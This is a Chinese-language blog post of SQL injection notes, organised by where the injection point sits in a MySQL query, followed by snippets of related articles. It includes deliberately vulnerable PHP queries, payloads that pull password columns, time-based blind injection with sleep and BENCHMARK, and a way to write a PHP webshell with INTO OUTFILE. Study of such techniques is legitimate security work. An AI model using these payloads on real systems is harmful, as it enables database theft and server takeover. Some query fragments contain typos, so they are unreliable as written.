SQL注入笔记(二)

最新推荐文章于 2024-06-17 08:39:45 发布
原创 最新推荐文章于 2024-06-17 08:39:45 发布 · 4.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细介绍了SQL注入的常见类型,包括SELECT注入、WHERE条件注入、GROUP BY和ORDER BY注入以及LIMIT后的注入。通过实例展示了如何利用注入点进行数据获取,同时提到了时间盲注和利用INTO OUTFILE写入webshell的方法。文章还提醒了开发者注意反引号包裹的注入点,并建议在不确定表名时查询information_schema数据库。最后,强调了注入点位置的判断和时间注入在无ORDER BY语句时的应用。

注入点

一、SELECT注入
1.注入点在select_expr
源码:$res=mysqli_query($conn,"SELECT ${_GET['id']},content ROM wp_news");
既可以采取时间盲注进行数据获取,也可以用AS别名的方法,将查询的结果直接显示到界面,访问?id=(select%20pwd%20from%20wp_user)%20as%20title
注意:若注入点有反引号包裹,应先闭合。
2.注入点在table_reference
SQL语句:$res=mysqli_query($conn,"select title from ${_GET['table']}");
直接用别名的方式取出数据,如:SELECT title FROM (SELECT pwd AS title FROM wp_user)x
在不知道表名的情况下可以先从information_schema.tables中查询表名。
注意:若注入点有反引号包裹,应先闭合。
3.注入点在WHERE和HAVING后:
SQL语句:$res=mysqli_query($conn,"SELECT title FROM wp_news where id={_GET[id]}");
4.注入点在GROUP BY和ORDER BY后
当遇到不是where后的注入点时,先在本地的MySQL中进行尝试,看语句后能加什么,从而判断当前可注入的位置,$res=mysqli_query($conn,"SELECT title FROM wp_news GROUP BY ${_GET['title']}");
经测试发现,title=id desc,(if(1,sleep(1),1))会让页面迟1秒,就可以用时间注入获取相关数据。
5.注入点在limit之后,由于语法限制,LIMIT后只能是数字,在SQL语句中没有ORDER BY语句时 ,可以直接时间注入PROCEDURE analysis(SELECT extravalue(1,concat(0x3a,(IF(MID(VERSION(),1,1) LIKE 5,BENCHMARK(5000000,SHA1(1)),1))))),))BENCHMARK语句处理时间大约是1秒,在有写入权限的特定情况条件下,我们也可以用into outfile语句想web目录写入webshell,在无法控制文件内容的情况下,可通过SELECT xx into outfile "/tmp/xxx.php"LINES TERMINATED BY'<?php phpinfo();?>的方式控制部分内容。

CC__LL__CC
关注
SQL注入速查笔记
10-22 4万+
SQL 注入分类方式: 提交方式:GET POST COOKIE 参数注入:数字型/字符型/搜索型 数据库类型:ACCESS/Mysql/MSSQL/Oracle 手工注入方法:联合查询、报错注入、盲注(基于布尔型、基于时间延迟) 0x01、Mysql Mysql划分:权限 root 普通用户 版本 mysql>5.0 mysql<5.0 1.1 root权限 lo...
预防SQL注入笔记
最新发布
2401_88755455的博客
02-10 1184
本文参考自owasp,重点是提供清晰,简单,可操作的指导,以防止应用程序中的SQL注入漏洞。发生了如此多的成功SQL注入攻击有点可耻,因为在代码中避免SQL注入漏洞非常简单。当软件开发人员创建包含用户提供的输入的动态数据库查询时,会引入SQL注入漏洞。为了避免SQL注入缺陷很简单。开发人员需要:a)停止编写动态查询;b)防止用户提供的包含恶意SQL的输入影响所执行查询的逻辑。本文提供了一组通过避免这两个问题来防止SQL注入漏洞的简单技术。这些技术几乎可以与任何类型的数据库一起使用。
SQL注入,很详细
m0_63683040的博客
04-20 3176
SQL注入(数字、UNION、字符型、布尔盲注、时间、报错、堆叠) SQL注入漏洞的方法 1.数字注入 在浏览器地址栏输入:learn.me/sql/article.php?id=1,这是一个get型接口,发送这个请求相当于调用一个查询语句: PHP源码: $sql = "SELECT * FROM database_name WHERE id =",$_GET[‘id’] 在浏览器地址栏输入:learn.me/sql/article.php?id=2-...
SQL注入漏洞底层原理解析(注入点原理)
Ciyaso的博客
07-14 940
sql注入时一种常见的漏洞,大部分人只知道sql注入漏洞是由于sql语句过滤不够严谨所导致的,但是为什么过滤不严谨就会造成sql注入,对于这个问题,我们今天就来深挖一下sql注入产生的根本原因-----深入研究注入点。 我再本地创建了两个表(命名和数据没有任何含义纯属瞎编的) Mysql版本5.1.60 第一个表:news,可以理解为存储新闻信息的表,是理论上允许客户访问使用的数据库,里面并不存储敏感信息。 第个表:ps,用于账号管理的表,里面有管理员账号,有敏感信息。 一、SELECT注入 PS:在
mysql benchmark 注入_sql注入------基于时间延迟benchmark函数注入脚本
weixin_39915505的博客
01-19 1449
#author:windy_2importrequestsurlx= 'http://127.0.0.1/?id= 1 and if((substr((select database()),'payloads= 'qwertyuiopasdfghjklzxcvbnm{}_0123456789'defguess_column(table):string= ''extend=0list=[]lengt...
sql注入-延时注入】sleep()、benchmark()函数 延时注入
热门推荐
07-10 1万+
【延时注入】结合if、case when 延时注入
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
sql注入笔记
03-15
SQL 注入笔记 SQL 注入是一种常见的 Web 应用程序漏洞,攻击者可以通过inject恶意 SQL 代码来访问、修改或控制数据库中的数据。本文将详细介绍 SQL 注入的基本概念、检测方法和防御策略。 什么是 SQL 注入SQL ...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
ctf-sql注入学习笔记
wwwyyyxxxx的博客
03-04 400
盲注:根据不同的输入得到的不同响应判断语句的正确性,进一步解flag,一般使用脚本或者sqlmap更方便,盲注又分为时间盲注和布尔盲注。sql注入原理:用户的输入未经检验或者成功逃逸,与sql语句拼接造成非法操作。时间盲注:根据页面的响应时间判断语句的真假一般使用if和sleep搭配使用。报错注入:利用特定函数的报错特性,使结果跟随报错一同输出。联合查询:使用union拼接其他语句查询。暂时写到这,有时间再写。
mysql benchmark 注入_MySQL注入(一)之常用函数和information_schema
weixin_28867333的博客
01-27 356
MySQL注入()之常用函数和information_schemaMySQL注入 information_schema0x00 常用函数DATABASE() 返回当前数据库名CONNECTION_ID() 返回当前客户的连接IDUSER()或SYSTEM_USER() 用户名CURRENT_USRE() 当前登陆用户名SESSION_USER() 连接数据库的用户名FOUND_ROWS(...
从零开始学SQL注入sql十大注入类型):技术解析与实战演练
xt350488的博客
06-17 6267
SQL 注入是比较常见的网络攻击方式之一,它不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至篡改数据库。由于以下的环境都是 MySQL 数据库,所以先了解点 MySQL 有关的知识。在 MySQL5.0 之后,MySQL 中默认添加了一个名为的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。mysql中注释符:# 、/**/ 、 --schemata。
【渗透测试】浅谈SQL注入
网络安全从业者的学习笔记
03-11 1809
关于SQL注入攻击的一些知识点
SQL注入技术
qq_25981849的博客
02-14 520
SQL注入技术 漏洞成因 SQL注入漏洞的原因是由于程序员没有严格过滤用户输入,导致用户输入语句与数据库语句拼接成了一个新的合法语句所产生的漏洞。 SQL注入应用技术 SQL注入可以用来读取文件、写入文件、执行系统命令。 SQL注入的不同类型和常用函数 有回显的注入 有回显的漏洞直接走一遍标准流程就行了 报错注入 有的时候页面会显示sql报错,在这种情况下,我们可以通过人为的报错将不可见的信息转换在错误信息显示出来。 updatexml报错注入 uname=Dumb&passwd=0' or upd
SQL注入
今天的风儿甚是喧嚣
07-07 410
常见SQL注入漏洞及其防御绕过方法
SQL注入介绍
妖魔鬼怪快离开的博客
03-11 2566
目录(一)SQL注入1.1 什么叫SQL注入1.2 SQL注入分类1.3 SQL漏洞探测1.4 SQL注入常用函数1.5 SQL注入防御 (一)SQL注入 1.1 什么叫SQL注入 程序不判断和处理用户输入数据的合法性,这使得攻击者能够在管理员不知情的情况下向Web应用程序中的预定义SQL语句添加额外的SQL语句并实施非法操作,从而欺骗数据库服务器执行未经授权的任意查询, 从而进一步获取数据信息。 简而言之,SQL注入是将SQL语句包含在用户输入的字符串中,如果在设计不佳的程序中忽略检查,注入的SQ
sql注入篇2
weixin_30319097的博客
01-14 129
一、前言   上一篇:sql注入篇1 、基于回显的注入类型判断   1、有结果的注入     例如下图: (sqlllab less-1)可以看到有正常结果返回,对于的利用方式就是老套路了,先order by查询出当前语句查询的列数,在使用union查询一一爆数据,当然,也可以使用脚本直接脱库。   2、基于布尔值的注入     通俗来说,就是盲注,回显的页面不会出现任...
SQL注入测试平台 SQLol -2.SELECT注入测试
Galaxy_0的博客
01-13 304
SQL注入测试平台 SQLol -2.SELECT注入测试
mysql select 注入_Mysql利用/*!select*/ 突破防注入
weixin_39880337的博客
01-19 203
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值